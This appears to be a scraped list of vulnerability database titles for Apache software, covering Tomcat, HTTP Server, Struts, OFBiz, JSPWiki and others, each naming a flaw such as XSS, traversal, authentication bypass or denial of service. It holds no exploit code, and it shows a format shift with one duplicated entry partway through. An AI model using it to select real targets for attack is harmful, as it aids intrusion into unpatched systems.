| [78113] Apache Tomcat Hash Collision Form Parameter Parsing Remote DoS
| [78112] Apache Geronimo Hash Collision Form Parameter Parsing Remote DoS
| [78109] Apache Struts ParameterInterceptor Traversal Arbitrary File Overwrite
| [78108] Apache Struts CookieInterceptor Cookie Name Handling Remote Command Execution
| [77593] Apache Struts Conversion Error OGNL Expression Injection
| [77496] Apache ActiveMQ Failover Mechanism Openwire Request Parsing Remote DoS
| [77444] Apache HTTP Server mod_proxy Mdule Web Request HTTP/0.9 Protocol URL Parsing Proxy Remote Security Bypass
| [77374] Apache MyFaces Java Bean includeViewParameters Parsing EL Expression Security Weakness
| [77310] Apache HTTP Server mod_proxy Reverse Proxy Mode Security Bypass Weakness (2011-4317)
| [77234] Apache HTTP Server on cygwin Encoded Traversal Arbitrary File Access
| [77012] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Memory Consumption DoS
| [76944] Apache Tomcat Manager Application Servlets Access Restriction Bypass
| [76744] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Overflow
| [76189] Apache Tomcat HTTP DIGEST Authentication Weakness
| [76079] Apache HTTP Server mod_proxy Mdule Web Request URL Parsing Proxy Remote Security Bypass (2011-3368)
| [76072] Apache JServ jserv.conf jserv-status Handler jserv/ URI Request Parsing Local Information Disclosure
| [75807] Apache HTTP Server Incomplete Header Connection Saturation Remote DoS
| [75647] Apache HTTP Server mod_proxy_ajp Module mod_proxy_balancer HTTP Request Remote DoS
| [75376] Apache Libcloud SSL Certificate Validation MitM Server Spoofing Weakness
| [74853] Domain Technologie Control /etc/apache2/apache2.conf File Permissions Weakness dtcdaemons User Password Disclosure
| [74818] Apache Tomcat AJP Message Injection Authentication Bypass
| [74725] Apache Wicket Multi Window Support Unspecified XSS
| [74721] Apache HTTP Server ByteRange Filter Memory Exhaustion Remote DoS
| [74541] Apache Commons Daemon Jsvc Permissions Weakness Arbitrary File Access
| [74535] Apache Tomcat XML Parser Cross-application Multiple File Manipulation
| [74447] Apache Struts XWork Nonexistent Method s:submit Element Internal Java Class Remote Path Disclosure
| [74262] Apache HTTP Server Multi-Processing Module itk.c Configuration Merger mpm-itk root UID / GID Remote Privilege Escalation
| [74120] Apache HTTP Server mod_authnz_external mysql/mysql-auth.pl user Field SQL Injection
| [73920] Oracle Secure Backup /apache/htdocts/php/common.php username Parameter Remote Code Execution
| [73798] Apache Tomcat sendfile Request Start / Endpoint Parsing Local DoS
| [73797] Apache Tomcat sendfile Request Attribute Validation Weakness Local Access Restriction Bypass
| [73776] Apache Tomcat HTTP BIO Connector HTTP Pipelining Cross-user Remote Response Access
| [73644] Apache XML Security Signature Key Parsing Overflow DoS
| [73600] Apache Struts javatemplates Plugin Component Handlers .action URI Multiple Parameter XSS
| [73462] Apache Rampart/C util/rampart_timestamp_token.c rampart_timestamp_token_validate Function Expired Token Remote Access Restriction Bypass
| [73429] Apache Tomcat JMX MemoryUserDatabase Local Password Disclosure
| [73384] Apache HTTP Server mod_rewrite PCRE Resource Exhaustion DoS
| [73383] Apache HTTP Server Portable Runtime (APR) Library apr_fnmatch() Infinite Loop Remote DoS
| [73378] IBM WebSphere Application Server (WAS) JavaServer Pages org.apache.jasper.runtime.JspWriterImpl.response JSP Page Application Restart Remote DoS
| [73247] Apache Subversion mod_dav_svn File Permission Weakness Information Disclosure
| [73246] Apache Subversion mod_dav_svn Path-based Access Control Rule Handling Remote DoS
| [73245] Apache Subversion mod_dav_svn Baselined Resource Request Handling Remote DoS
| [73154] Apache Archiva Multiple Unspecified CSRF
| [73153] Apache Archiva /archiva/admin/deleteNetworkProxy!confirm.action proxyid Parameter XSS
| [72407] Apache Tomcat @ServletSecurity Initial Load Annotation Security Constraint Bypass Information Disclosure
| [72238] Apache Struts Action / Method Names <
| [71647] Apache HttpComponents HttpClient Proxy-Authorization Credentials Remote Disclosure
| [71558] Apache Tomcat SecurityManager ServletContext Attribute Traversal Arbitrary File Manipulation
| [71557] Apache Tomcat HTML Manager Multiple XSS
| [71075] Apache Archiva User Management Page XSS
| [71027] Apache Tomcat @ServletSecurity Annotation Security Constraint Bypass Information Disclosure
| [70925] Apache Continuum Project Pages Unspecified XSS (2011-0533)
| [70924] Apache Continuum Multiple Admin Function CSRF
| [70809] Apache Tomcat NIO HTTP Connector Request Line Processing DoS
| [70734] Apache CouchDB Request / Cookie Handling Unspecified XSS
| [70585] Oracle Fusion Middleware Oracle HTTP Server Apache Plugin Unspecified Remote Issue
| [70333] Apache Subversion rev_hunt.c blame Command Multiple Memory Leak Remote DoS
| [70332] Apache Subversion Apache HTTP Server mod_dav_svn repos.c walk FunctionSVNParentPath Collection Remote DoS
| [69659] Apache Archiva Admin Authentication Weakness Privilege Escalation
| [69520] Apache Archiva Administrator Credential Manipulation CSRF
| [69512] Apache Tomcat Set-Cookie Header HTTPOnly Flag Session Hijacking Weakness
| [69456] Apache Tomcat Manager manager/html/sessions Multiple Parameter XSS
| [69275] Apache mod_fcgid Module fcgid_bucket.c fcgid_header_bucket_read() Function Remote Overflow
| [69067] Apache Shiro URI Path Security Traversal Information Disclosure
| [68815] Apache MyFaces shared/util/StateUtils.java View State MAC Weakness Cryptographic Padding Remote View State Modification
| [68670] Apache Qpid C++ Broker Component broker/SessionAdapter.cpp SessionAdapter::ExchangeHandlerImpl::checkAlternate Function Exchange Alternate Remote DoS
| [68669] Apache Qpid cluster/Cluster.cpp Cluster::deliveredEvent Function Invalid AMQP Data Remote DoS
| [68662] Apache Axis2 dswsbobje.war Module Admin Account Default Password
| [68531] Apache Qpid qpidd sys/ssl/SslSocket.cpp Incomplete SSL Handshake Remote DoS
| [68327] Apache APR-util buckets/apr_brigade.c apr_brigade_split_line() Function Memory Consumption DoS
| [68314] Apache XML-RPC SAX Parser External Entity Information Disclosure
| [67964] Apache Traffic Server Transaction ID / Source Port Randomization Weakness DNS Cache Poisoning
| [67846] SUSE Lifecycle Management Server on SUSE Linux Enterprise apache2-slms Parameter Quoting CSRF
| [67294] Apache CXF XML SOAP Message Crafted Document Type Declaration Remote DoS
| [67240] Apache CouchDB Installation Page Direct Request Arbitrary JavaScript Code Execution CSRF
| [67205] Apache Derby BUILTIN Authentication Password Hash Generation Algorithm SHA-1 Transformation Password Substitution
| [66745] Apache HTTP Server Multiple Modules Pathless Request Remote DoS
| [66319] Apache Tomcat Crafted Transfer-Encoding Header Handling Buffer Recycling Remote DoS
| [66280] Apache Struts XWork ParameterInterceptor Server-Side Object Remote Code Execution
| [66226] Apache Axis2 Admin Interface Cookie Session Fixation
| [65697] Apache Axis2 / Java SOAP Message DTD Rejection Weakness Arbitrary File Access
| [65654] Apache HTTP Server mod_proxy_http mod_proxy_http.c Timeout Detection Weakness HTTP Request Response Disclosure
| [65429] Apache MyFaces Unencrypted ViewState Serialized View Object Manipulation Arbitrary Expression Language (EL) Statement Execution
| [65054] Apache ActiveMQ Jetty Error Handler XSS
| [64844] Apache Axis2/Java axis2/axis2-admin/engagingglobally modules Parameter XSS
| [64522] Apache Open For Business Project (OFBiz) ecommerce/control/contactus Multiple Parameter XSS
| [64521] Apache Open For Business Project (OFBiz) Web Tools Section entityName Parameter XSS
| [64520] Apache Open For Business Project (OFBiz) ecommerce/control/ViewBlogArticle contentId Parameter XSS
| [64519] Apache Open For Business Project (OFBiz) Control Servlet URI XSS
| [64518] Apache Open For Business Project (OFBiz) Show Portal Page Section start Parameter XSS
| [64517] Apache Open For Business Project (OFBiz) View Profile Section partyId Parameter XSS
| [64516] Apache Open For Business Project (OFBiz) Export Product Listing Section productStoreId Parameter XSS
| [64307] Apache Tomcat Web Application Manager/Host Manager CSRF
| [64056] mod_auth_shadow for Apache HTTP Server wait() Function Authentication Bypass
| [64023] Apache Tomcat WWW-Authenticate Header Local Host Information Disclosure
| [64020] Apache ActiveMQ Jetty ResourceHandler Crafted Request JSP File Source Disclosure
| [63895] Apache HTTP Server mod_headers Unspecified Issue
| [63368] Apache ActiveMQ createDestination.action JMSDestination Parameter CSRF
| [63367] Apache ActiveMQ createDestination.action JMSDestination Parameter XSS
| [63350] Apache CouchDB Hash Verification Algorithm Predictable Execution Time Weakness
| [63140] Apache Thrift Service Malformed Data Remote DoS
| [62676] Apache HTTP Server mod_proxy_ajp Module Crafted Request Remote DoS
| [62675] Apache HTTP Server Multi-Processing Module (MPM) Subrequest Header Handling Cross-thread Information Disclosure
| [62674] Apache HTTP Server mod_isapi Module Unloading Crafted Request Remote DoS
| [62231] Apache HTTP Server Logging Format Weakness Crafted DNS Response IP Address Spoofing
| [62230] Apache HTTP Server Crafted DNS Response Inverse Lookup Log Corruption XSS
| [62054] Apache Tomcat WAR Filename Traversal Work-directory File Deletion
| [62053] Apache Tomcat Autodeployment Process appBase File HTTP Request Authentication Bypass
| [62052] Apache Tomcat WAR File Traversal Arbitrary File Overwrite
| [62009] Apache HTTP Server src/modules/proxy/proxy_util.c mod_proxy ap_proxy_send_fb() Function Overflow
| [61379] Apache River Outrigger Entry Storage Saturation Memory Exhaustion DoS
| [61378] Apache Hadoop Map/Reduce JobTracker Memory Consumption DoS
| [61377] Apache Commons Modeler Multiple Mutable Static Fields Weakness
| [61376] Apache Rampart wsse:security Tag Signature Value Checking Weakness
| [60687] Apache C++ Standard Library (STDCXX) strxfrm() Function Overflow
| [60680] Apache Hadoop JobHistory Job Name Manipulation Weakness
| [60679] Apache ODE DeploymentWebService OMElement zipPart CRLF Injection
| [60678] Apache Roller Comment Email Notification Manipulation DoS
| [60677] Apache CouchDB Unspecified Document Handling Remote DoS
| [60428] Sun Java Plug-in org.apache.crimson.tree.XmlDocument Class reateXmlDocument Method Floppy Drive Access Bypass
| [60413] mod_throttle for Apache Shared Memory File Manipulation Local Privilege Escalation
| [60412] Sun Java Plug-in org.apache.xalan.processor.XSLProcessorVersion Class Unsigned Applet Variable Sharing Privilege Escalation
| [60396] Apache HTTP Server on OpenBSD Multipart MIME Boundary Remote Information Disclosure
| [60395] Apache HTTP Server on OpenBSD ETag HTTP Header Remote Information Disclosure
| [60232] PHP on Apache php.exe Direct Request Remote DoS
| [60176] Apache Tomcat Windows Installer Admin Default Password
| [60016] Apache HTTP Server on HP Secure OS for Linux HTTP Request Handling Unspecified Issue
| [59979] Apache HTTP Server on Apple Mac OS X HTTP TRACE Method Unspecified Client XSS
| [59969] Apache HTTP Server mod_ssl SSL / TLS Renegotiation Handshakes MiTM Plaintext Data Injection
| [59944] Apache Hadoop jobhistory.jsp XSS
| [59374] Apache Solr Search Extension for TYPO3 Unspecified XSS
| [59022] Apache Shindig ConcatProxyServlet HTTP Header Response Splitting
| [59021] Apache Cocoon X-Cocoon-Version Header Remote Information Disclosure
| [59020] Apache Tapestry HTTPS Session Cookie Secure Flag Weakness
| [59019] Apache mod_python Cookie Salting Weakness
| [59018] Apache Harmony Error Message Handling Overflow
| [59013] Apache Derby SYSCS_EXPORT_TABLE Arbitrary File Overwrite
| [59012] Apache Derby Driver Auto-loading Non-deterministic Startup Weakness
| [59011] Apache JSPWiki Page Attachment Change Note Function XSS
| [59010] Apache Solr get-file.jsp XSS
| [59009] Apache Solr action.jsp XSS
| [59008] Apache Solr analysis.jsp XSS
| [59007] Apache Solr schema.jsp Multiple Parameter XSS
| [59006] Apache Beehive select / checkbox Tag XSS
| [59005] Apache Beehive jpfScopeID Global Parameter XSS
| [59004] Apache Beehive Error Message XSS
| [59003] Apache HttpClient POST Request Handling Memory Consumption DoS
| [59002] Apache Jetspeed default-page.psml URI XSS
| [59001] Apache Axis2 xsd Parameter Traversal Arbitrary File Disclosure
| [59000] Apache CXF Unsigned Message Policy Bypass
| [58999] Apache WSS4J CallbackHandler Plaintext Password Validation Weakness
| [58998] Apache OpenJPA persistence.xml Cleartext Password Local Disclosure
| [58997] Apache OpenEJB openejb.xml Cleartext Password Local Disclosure
| [58996] Apache Hadoop Map/Reduce LinuxTaskController File Group Ownership Weakness
| [58995] Apache Hadoop Map/Reduce Task Ownership Weakness
| [58994] Apache Hadoop Map/Reduce DistributedCache Localized File Permission Weakness
| [58993] Apache Hadoop browseBlock.jsp XSS
| [58991] Apache Hadoop browseDirectory.jsp XSS
| [58990] Apache Hadoop Map/Reduce HTTP TaskTrackers User Data Remote Disclosure
| [58989] Apache Hadoop Sqoop Process Listing Local Cleartext Password Disclosure
| [58988] Apache Hadoop Chukwa HICC Portal Unspecified XSS
| [58987] Apache Hadoop Map/Reduce TaskTracker User File Permission Weakness
| [58986] Apache Qpid Encrypted Message Handling Remote Overflow DoS
| [58985] Apache Qpid Process Listing Local Cleartext Password Disclosure
| [58984] Apache Jackrabbit Content Repository (JCR) Default Account Privilege Access Weakness
| [58983] Apache Jackrabbit Content Repository (JCR) NamespaceRegistry API Registration Method Race Condition
| [58982] Apache Synapse Proxy Service Security Policy Mismatch Weakness
| [58981] Apache Geronimo TomcatGeronimoRealm Security Context Persistence Weakness
| [58980] Apache Geronimo LDAP Realm Configuration Restart Reversion Weakness
| [58979] Apache MyFaces Tomahawk ExtensionsPhaseListener HTML Injection Information Disclosure
| [58978] Apache MyFaces Trinidad LocaleInfoScriptlet XSS
| [58977] Apache Open For Business Project (OFBiz) Multiple Default Accounts
| [58976] Apache Open For Business Project (OFBiz) URI passThru Parameter XSS
| [58975] Apache Open For Business Project (OFBiz) PARTYMGR_CREATE/UPDATE Permission Arbitrary User Password Modification
| [58974] Apache Sling /apps Script User Session Management Access Weakness
| [58973] Apache Tuscany Crafted SOAP Request Access Restriction Bypass
| [58931] Apache Geronimo Cookie Parameters Validation Weakness
| [58930] Apache Xalan-C++ XPath Handling Remote DoS
| [58879] Apache Portable Runtime (APR-util) poll/unix/port.c Event Port Backend Pollset Feature Remote DoS
| [58837] Apache Commons Net FTPSClient CipherSuites / Protocols Mutable Object Unspecified Data Security Issue
| [58813] Apache MyFaces Trinidad tr:table / HTML Comment Handling DoS
| [58812] Apache Open For Business Project (OFBiz) JSESSIONID Session Hijacking Weakness
| [58811] Apache Open For Business Project (OFBiz) /catalog/control/EditProductConfigItem configItemId Parameter XSS
| [58810] Apache Open For Business Project (OFBiz) /catalog/control/EditProdCatalo prodCatalogId Parameter XSS
| [58809] Apache Open For Business Project (OFBiz) /partymgr/control/viewprofile partyId Parameter XSS
| [58808] Apache Open For Business Project (OFBiz) /catalog/control/createProduct internalName Parameter XSS
| [58807] Apache Open For Business Project (OFBiz) Multiple Unspecified CSRF
| [58806] Apache FtpServer MINA Logging Filter Cleartext Credential Local Disclosure
| [58805] Apache Derby Unauthenticated Database / Admin Access
| [58804] Apache Wicket Header Contribution Unspecified Issue
| [58803] Apache Wicket Session Fixation
| [58802] Apache Directory Server (ApacheDS) userPassword Attribute Search Password Disclosure
| [58801] Apache ActiveMQ Stomp Client Credential Validation Bypass
| [58800] Apache Tapestry (context)/servicestatus Internal Service Information Disclosure
| [58799] Apache Tapestry Logging Cleartext Password Disclosure
| [58798] Apache Jetspeed pipeline Parameter pipeline-map Policy Bypass
| [58797] Apache Jetspeed Password Policy Multiple Weaknesses
| [58796] Apache Jetspeed Unsalted Password Storage Weakness
| [58795] Apache Rampart Crafted SOAP Header Authentication Bypass
| [58794] Apache Roller Admin Protocol (RAP) Malformed Header Authentication Bypass
| [58793] Apache Hadoop Map/Reduce mapred.system.dir Permission Weakness Job Manipulation
| [58792] Apache Shindig gadgets.rpc iframe RPC Call Validation Weakness
| [58791] Apache Synapse synapse.properties Cleartext Credential Local Disclosure
| [58790] Apache WSS4J SOAP Message UsernameToken Remote Password Disclosure
| [58789] Apache WSS4J SOAP Header Malformed UsernameToken Authentication Bypass
| [58776] Apache JSPWiki PreviewContent.jsp Edited Text XSS
| [58775] Apache JSPWiki preview.jsp action Parameter XSS
| [58774] Apache JSPWiki Edit.jsp Multiple Parameter XSS
| [58773] Apache JSPWiki Accept-Language Header Multiple Script language Parameter XSS
| [58772] Apache JSPWiki EditorManager.java editor Parameter XSS
| [58771] Apache JSPWiki GroupContent.jsp Multiple Parameter XSS
| [58770] Apache JSPWiki Group.jsp group Parameter XSS
| [58769] Apache JSPWiki Database Connection Termination DoS Weakness
| [58768] Apache JSPWiki Attachment Servlet nextpage Parameter Arbitrary Site Redirect
| [58766] Apache JSPWiki /admin/SecurityConfig.jsp Direct Request Information Disclosure
| [58765] Apache JSPWiki Spam Filter UniqueID RNG Weakness
| [58764] Apache JSPWiki Edit.jsp Multiple Parameter XSS
| [58763] Apache JSPWiki Include Tag Multiple Script XSS
| [58762] Apache JSPWiki Multiple .java Tags pageContext Parameter XSS
| [58761] Apache JSPWiki Wiki.jsp skin Parameter XSS
| [58760] Apache Commons VFS Exception Error Message Cleartext Credential Disclosure
16673| [58760] Apache Commons VFS Exception Error Message Cleartext Credential Disclosure
16674| [58759] Apache Jackrabbit Content Repository (JCR) UUID System.currentTimeMillis() RNG Weakness
16675| [58758] Apache River GrantPermission Policy Manipulation Privilege Escalation
16676| [58757] Apache WS-Commons Java2 StaXUtils Multiple Unspecified Minor Issues
16677| [58756] Apache WSS4J WSHandler Client Certificate Signature Validation Weakness
16678| [58755] Apache Harmony DRLVM Non-public Class Member Access
16679| [58754] Apache Harmony File.createTempFile() Temporary File Creation Prediction Weakness
16680| [58751] Apache Geronimo GeronimoIdentityResolver Subject Handling Multiple Issues
16681| [58750] Apache MyFaces Trinidad Generated HTML Information Disclosure
16682| [58749] Apache MyFaces Trinidad Database Access Error Message Information Disclosure
16683| [58748] Apache MyFaces Trinidad Image Resource Loader Traversal Arbitrary Image Access
16684| [58747] Apache MyFaces Trinidad Error Message User Entered Data Disclosure Weakness
16685| [58746] Apache Axis2 JAX-WS Java2 WSDL4J Unspecified Issue
16686| [58744] Apache Wicket Crafted File Upload Disk Space Exhaustion DoS
16687| [58743] Apache Wicket wicket.util.crypt.SunJceCrypt Encryption Reversion Weakness
16688| [58742] Apache Rampart PolicyBasedValiadtor HttpsToken Endpoint Connection Weakness
16689| [58741] Apache Rampart WSSecSignature / WSSecEncryptedKey KeyIdentifierType Validation Weakness
16690| [58740] Apache Rampart TransportBinding Message Payload Cleartext Disclosure
16691| [58739] Apache Open For Business Project (OFBiz) Unsalted Password Storage Weakness
16692| [58738] Apache Open For Business Project (OFBiz) orderId Parameter Arbitrary Order Access
16693| [58737] Apache mod_python w/ mod_python.publisher index.py Underscore Prefixed Variable Disclosure
16694| [58735] Apache Open For Business Project (OFBiz) /ecommerce/control/keywordsearch SEARCH_STRING Parameter XSS
16695| [58734] Apache Torque Log File Cleartext Credential Local Disclosure
16696| [58733] Apache Axis2 doGet Implementation Authentication Bypass Service State Manipulation
16697| [58732] Apache MyFaces UIInput.validate() Null Value Validation Bypass Weakness
16698| [58731] Apache MyFaces /faces/* Prefix Mapping Authentication Bypass
16699| [58725] Apache Tapestry Basic String ACL Bypass Weakness
16700| [58724] Apache Roller Logout Functionality Failure Session Persistence
16701| [58723] Apache Roller User Profile / Admin Page Cleartext Password Disclosure
16702| [58722] Apache Derby Connection URL Encryption Method Reversion Weakness
16703| [58721] Apache Geronimo on Tomcat Security-constraint Resource ACL Bypass
16704| [58720] Apache Geronimo Explicit Servlet Mapping Access Bypass Weakness
16705| [58719] Apache Geronimo Keystore Unprivileged Service Disable DoS
16706| [58718] Apache Geronimo Deployment Plans Remote Password Disclosure
16707| [58717] Apache Jetspeed Portlet Application Edit Access Restriction Bypass
16708| [58716] Apache Jetspeed PSML Management Cached Constraint Authentication Weakness
16709| [58707] Apache WSS4J Crafted PasswordDigest Request Authentication Bypass
16710| [58706] Apache HttpClient Pre-emptive Authorization Remote Credential Disclosure
16711| [58705] Apache Directory Server (ApacheDS) User Passwords Cleartext Disclosure
16712| [58704] Apache Directory Server (ApacheDS) Non-existent User LDAP Bind Remote DoS
16713| [58703] Apache Geronimo Debug Console Unauthenticated Remote Information Disclosure
16714| [58702] Apache Directory Server (ApacheDS) Persistent LDAP Anonymous Bind Weakness
16715| [58701] Apache Jetspeed User Admin Portlet Unpassworded Account Creation Weakness
16716| [58700] Apache MyFaces /faces/* Path Handling Remote Overflow DoS
16717| [58699] Apache MyFaces Disable Property Client Side Manipulation Privilege Escalation
16718| [58698] Apache Roller Remember Me Functionality Cleartext Password Disclosure
16719| [58697] Apache XalanJ2 org.apache.xalan.xsltc.runtime.CallFunction Class Unspecified Issue
16720| [58696] Apache Tapestry Encoded Traversal Arbitrary File Access
16721| [58695] Apache Jetspeed Unauthenticated PSML Tags / Admin Folder Access
16722| [58694] Apache Geronimo Deploy Tool Process List Local Credential Disclosure
16723| [58693] Apache Derby service.properties File Encryption Key Information Disclosure
16724| [58692] Apache Geronimo Default Security Realm Login Brute Force Weakness
16725| [58689] Apache Roller Retrieve Last 5 Post Feature Unauthorized Blog Post Manipulation
16726| [58688] Apache Xalan-Java (XalanJ2) Static Variables Multiple Unspecified Issues
16727| [58687] Apache Axis Invalid wsdl Request XSS
16728| [58686] Apache Cocoon Temporary File Creation Unspecified Race Condition
16729| [58685] Apache Velocity Template Designer Privileged Code Execution
16730| [58684] Apache Jetspeed controls.Customize Action Security Check Bypass
16731| [58675] Apache Open For Business Project (OFBiz) eCommerce/ordermgr Multiple Field XSS
16732| [58674] Apache Open For Business Project (OFBiz) ecommerce/control/login Multiple Field XSS
16733| [58673] Apache Open For Business Project (OFBiz) ecommerce/control/viewprofile Multiple Field XSS
16734| [58672] Apache Open For Business Project (OFBiz) POS Input Panel Cleartext Password Disclosure
16735| [58671] Apache Axis2 JMS Signed Message Crafted WS-Security Header Security Bypass
16736| [58670] Apache Jetspeed JetspeedTool.getPortletFromRegistry Portlet Security Validation Failure
16737| [58669] Apache Jetspeed LDAP Cleartext Passwords Disclosure
16738| [58668] Apache Axis External Entity (XXE) Data Parsing Privilege Escalation
16739| [58667] Apache Roller Database Cleartext Passwords Disclosure
16740| [58666] Apache Xerces-C++ UTF-8 Transcoder Overlong Code Handling Unspecified Issue
16741| [58665] Apache Jetspeed Turbine: Cross-user Privileged Action Execution
16742| [58664] Apache Jetspeed EditAccount.vm Password Modification Weakness
16743| [58663] Apache Jetspeed Role Parameter Arbitrary Portlet Disclosure
16744| [58662] Apache Axis JWS Page Generated .class File Direct Request Information Disclosure
16745| [58661] Apache Jetspeed user-form.vm Password Reset Cleartext Disclosure
16746| [58660] Apache WSS4J checkReceiverResults Function Crafted SOAP Request Authentication Bypass
16747| [58658] Apache Rampart Crafted SOAP Request Security Verification Bypass
16748| [57882] Apache HTTP Server mod_proxy_ftp Authorization HTTP Header Arbitrary FTP Command Injection
16749| [57851] Apache HTTP Server mod_proxy_ftp EPSV Command NULL Dereference Remote DoS
16750| [56984] Apache Xerces2 Java Malformed XML Input DoS
16751| [56903] Apache ODE (Orchestration Director Engine) Process Deployment Web Service Traversal Arbitrary File Manipulation
16752| [56859] Apache Xerces-C++ Multiple Sub-project XML Nested DTD Structures Parsing Recursion Error DoS
16753| [56766] Apache Portable Runtime (APR-util) memory/unix/apr_pools.c Relocatable Memory Block Aligning Overflow
16754| [56765] Apache Portable Runtime (APR-util) misc/apr_rmm.c Multiple Function Overflows
16755| [56517] Apache HTTP Server File Descriptor Leak Arbitrary Local File Append
16756| [56443] PTK Unspecified Apache Sub-process Arbitrary Command Execution
16757| [56414] Apache Tiles Duplicate Expression Language (EL) Expression Evaluation XSS
16758| [55814] mod_NTLM for Apache HTTP Server ap_log_rerror() Function Remote Format String
16759| [55813] mod_NTLM for Apache HTTP Server log() Function Remote Overflow
16760| [55782] Apache HTTP Server mod_deflate Module Aborted Connection DoS
16761| [55553] Apache HTTP Server mod_proxy Module mod_proxy_http.c stream_reqbody_cl Function CPU Consumption DoS
16762| [55059] Apache APR-util strmatch/apr_strmatch.c apr_strmatch_precompile Function Crafted Input Remote DoS
16763| [55058] Apache APR-util apr_brigade_vprintf Function Crafted Input Off-by-one Remote DoS
16764| [55057] Apache APR-util xml/apr_xml.c apr_xml_* Interface Expat XML Parser Crafted XML Document Remote DoS
16765| [55056] Apache Tomcat Cross-application TLD File Manipulation
16766| [55055] Apache Tomcat Illegal URL Encoded Password Request Username Enumeration
16767| [55054] Apache Tomcat Java AJP Connector mod_jk Load Balancing Worker Malformed Header Remote DoS
16768| [55053] Apache Tomcat Crafted Request Security Restraint Bypass Arbitrary Content Access
16769| [54733] Apache HTTP Server AllowOverride Directive .htaccess Options Bypass
16770| [54713] razorCMS Security Manager apache User Account Unspecified File Permission Weakness Issue
16771| [54589] Apache Jserv Nonexistent JSP Request XSS
16772| [54122] Apache Struts s:a / s:url Tag href Element XSS
16773| [54093] Apache ActiveMQ Web Console JMS Message XSS
16774| [53932] Apache Geronimo Multiple Admin Function CSRF
16775| [53931] Apache Geronimo /console/portal/Server/Monitoring Multiple Parameter XSS
16776| [53930] Apache Geronimo /console/portal/ URI XSS
16777| [53929] Apache Geronimo on Windows Security/Keystores Portlet Traversal Arbitrary File Upload
16778| [53928] Apache Geronimo on Windows Embedded DB/DB Manager Portlet Traversal Arbitrary File Upload
16779| [53927] Apache Geronimo on Windows Services/Repository Portlet Traversal Arbitrary File Upload
16780| [53921] Apache HTTP Server mod_proxy_ajp Cross Thread/Session Information Disclosure
16781| [53766] Oracle BEA WebLogic Server Plug-ins for Apache Certificate Handling Remote Overflow
16782| [53574] PHP on Apache .htaccess mbstring.func_overload Setting Cross Hosted Site Behavior Modification
16783| [53381] Apache Tomcat JK Connector Content-Length Header Cross-user Information Disclosure
16784| [53380] Apache Struts Unspecified XSS
16785| [53289] Apache mod_perl Apache::Status /perl-status Unspecified XSS
16786| [53186] Apache HTTP Server htpasswd Predictable Salt Weakness
16787| [52899] Apache Tomcat Examples Web Application Calendar Application jsp/cal/cal2.jsp time Parameter XSS
16788| [52407] Apache Tomcat doRead Method POST Content Information Disclosure
16789| [51923] Apache HTTP Server mod-auth-mysql Module mod_auth_mysql.c Multibyte Character Encoding SQL Injection
16790| [51613] Apache HTTP Server Third-party Module Child Process File Descriptor Leak
16791| [51612] Apache HTTP Server Internal Redirect Handling Infinite Loop DoS
16792| [51468] Apache Jackrabbit Content Repository (JCR) swr.jsp q Parameter XSS
16793| [51467] Apache Jackrabbit Content Repository (JCR) search.jsp q Parameter XSS
16794| [51151] Apache Roller Search Function q Parameter XSS
16795| [50482] PHP with Apache php_value Order Unspecified Issue
16796| [50475] Novell NetWare ApacheAdmin Console Unauthenticated Access
16797| [49734] Apache Struts DefaultStaticContentLoader Class Traversal Arbitrary File Access
16798| [49733] Apache Struts FilterDispatcher Class Traversal Arbitrary File Access
16799| [49283] Oracle BEA WebLogic Server Plugins for Apache Remote Transfer-Encoding Overflow
16800| [49062] Apache Tomcat Cross-thread Concurrent Request Variable Overwrite Information Disclosure
16801| [48847] ModSecurity (mod_security) Transformation Caching Unspecified Apache DoS
16802| [48788] Apache Xerces-C++ XML Schema maxOccurs Value XML File Handling DoS
16803| [47474] Apache HTTP Server mod_proxy_ftp Directory Component Wildcard Character XSS
16804| [47464] Apache Tomcat allowLinking / UTF-8 Traversal Arbitrary File Access
16805| [47463] Apache Tomcat RequestDispatcher Traversal Arbitrary File Access
16806| [47462] Apache Tomcat HttpServletResponse.sendError Method Message Argument XSS
16807| [47096] Oracle Weblogic Apache Connector POST Request Overflow
16808| [46382] Frontend Filemanager (air_filemanager) Extension for TYPO3 on Apache Unspecified Arbitrary Code Execution
16809| [46285] TYPO3 on Apache Crafted Filename Upload Arbitrary Command Execution
16810| [46085] Apache HTTP Server mod_proxy ap_proxy_http_process_response() Function Interim Response Forwarding Remote DoS
16811| [45905] Apache Tomcat Host Manager host-manager/html/add name Parameter XSS
16812| [45879] Ragnarok Online Control Panel on Apache Crafted Traversal Authentication Bypass
16813| [45742] Apache HTTP Server on Novell Unspecified Request Directive Internal IP Disclosure
16814| [45740] Apache Derby DropSchemaNode Bind Phase Arbitrary Scheme Statement Dropping
16815| [45599] Apache Derby Lock Table Statement Privilege Requirement Bypass Arbitrary Table Lock
16816| [45585] Apache Derby ACCSEC Command RDBNAM Parameter Cleartext Credential Disclosure
16817| [45584] Apache Derby DatabaseMetaData.getURL Function Cleartext Credential Disclosure
16818| [45420] Apache HTTP Server 403 Error Page UTF-7 Encoded XSS
16819| [44728] PHP Toolkit on Gentoo Linux Interpretation Conflict Apache HTTP Server Local DoS
16820| [44618] Oracle JSP Apache/Jserv Path Translation Traversal Arbitrary JSP File Execution
16821| [44159] Apache HTTP Server Remote Virtual Host Name Disclosure
16822| [43997] Apache-SSL ExpandCert() Function Certificate Handling Arbitrary Environment Variables Manipulation
16823| [43994] suPHP for Apache (mod_suphp) Directory Symlink Local Privilege Escalation
16824| [43993] suPHP for Apache (mod_suphp) Owner Mode Race Condition Symlink Local Privilege Escalation
16825| [43663] Apache HTTP Server Mixed Platform AddType Directive Crafted Request PHP Source Disclosure
16826| [43658] AuthCAS Module (AuthCAS.pm) for Apache HTTP Server SESSION_COOKIE_NAME SQL Injection
16827| [43452] Apache Tomcat HTTP Request Smuggling
16828| [43309] Apache Geronimo LoginModule Login Method Bypass
16829| [43290] Apache JSPWiki Entry Page Attachment Unrestricted File Upload
16830| [43259] Apache HTTP Server on Windows mod_proxy_balancer URL Handling Remote Memory Corruption
16831| [43224] Apache Geronimo on SuSE Linux init Script Symlink Unspecified File/Directory Access
16832| [43189] Apache mod_jk2 Host Header Multiple Fields Remote Overflow
16833| [42937] Apache HTTP Server mod_proxy_balancer balancer-manager Unspecified CSRF
16834| [42341] MOD_PLSQL for Apache Unspecified URL SQL Injection
16835| [42340] MOD_PLSQL for Apache CGI Environment Handling Unspecified Overflow
16836| [42214] Apache HTTP Server mod_proxy_ftp UTF-7 Encoded XSS
16837| [42091] Apache Maven Site Plugin Installation Permission Weakness
16838| [42089] Apache Maven .m2/settings.xml Cleartext Password Disclosure
